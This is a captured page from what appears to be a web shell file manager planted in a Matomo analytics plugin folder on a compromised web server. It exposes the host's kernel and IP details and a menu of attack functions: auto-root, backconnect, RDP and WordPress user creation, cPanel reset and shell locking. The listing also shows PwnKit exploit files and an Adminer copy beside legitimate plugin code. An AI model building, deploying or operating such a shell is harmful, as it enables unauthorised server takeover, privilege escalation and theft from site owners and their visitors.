Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 216.73.216.22
46 Domain
7.2.34
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
analytics /
plugins /
Live /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
Categories
[ DIR ]
drwxr-xr-x
Exception
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
ProfileSummary
[ DIR ]
drwxr-xr-x
Reports
[ DIR ]
drwxr-xr-x
Visualizations
[ DIR ]
drwxr-xr-x
Widgets
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
javascripts
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
stylesheets
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
vue
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
API.php
16.3
KB
-rw-r--r--
Controller.php
9.77
KB
-rw-r--r--
Live.php
9.2
KB
-rw-r--r--
MeasurableSettings.php
2.02
KB
-rw-r--r--
Model.php
24.78
KB
-rw-r--r--
ProfileSummaryProvider.php
2.73
KB
-rw-r--r--
SystemSettings.php
1.71
KB
-rw-r--r--
Visitor.php
10.43
KB
-rw-r--r--
VisitorDetails.php
10.04
KB
-rw-r--r--
VisitorDetailsAbstract.php
8.81
KB
-rw-r--r--
VisitorFactory.php
1.57
KB
-rw-r--r--
VisitorInterface.php
382
B
-rw-r--r--
VisitorProfile.php
3.73
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SystemSettings.php
<?php /** * Matomo - free/libre analytics platform * * @link https://matomo.org * @license http://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later */ namespace Piwik\Plugins\Live; use Piwik\Piwik; use Piwik\Settings\FieldConfig; use Piwik\Settings\Plugin\SystemSetting; class SystemSettings extends \Piwik\Settings\Plugin\SystemSettings { /** @var SystemSetting|null */ public $disableVisitorLog; /** @var SystemSetting|null */ public $disableVisitorProfile; protected function init() { $this->disableVisitorLog = $this->makeVisitorLogSetting(); $this->disableVisitorProfile = $this->makeVisitorProfileSetting(); } private function makeVisitorLogSetting(): SystemSetting { $defaultValue = false; $type = FieldConfig::TYPE_BOOL; return $this->makeSetting('disable_visitor_log', $defaultValue, $type, function (FieldConfig $field) { $field->title = Piwik::translate('Live_DisableVisitsLogAndProfile'); $field->inlineHelp = Piwik::translate('Live_DisableVisitsLogAndProfileDescription'); $field->uiControl = FieldConfig::UI_CONTROL_CHECKBOX; }); } private function makeVisitorProfileSetting(): SystemSetting { $defaultValue = false; $type = FieldConfig::TYPE_BOOL; return $this->makeSetting('disable_visitor_profile', $defaultValue, $type, function (FieldConfig $field) { $field->title = Piwik::translate('Live_DisableVisitorProfile'); $field->inlineHelp = Piwik::translate('Live_DisableVisitorProfileDescription'); $field->uiControl = FieldConfig::UI_CONTROL_CHECKBOX; $field->condition = 'disable_visitor_log==0'; }); } }
Close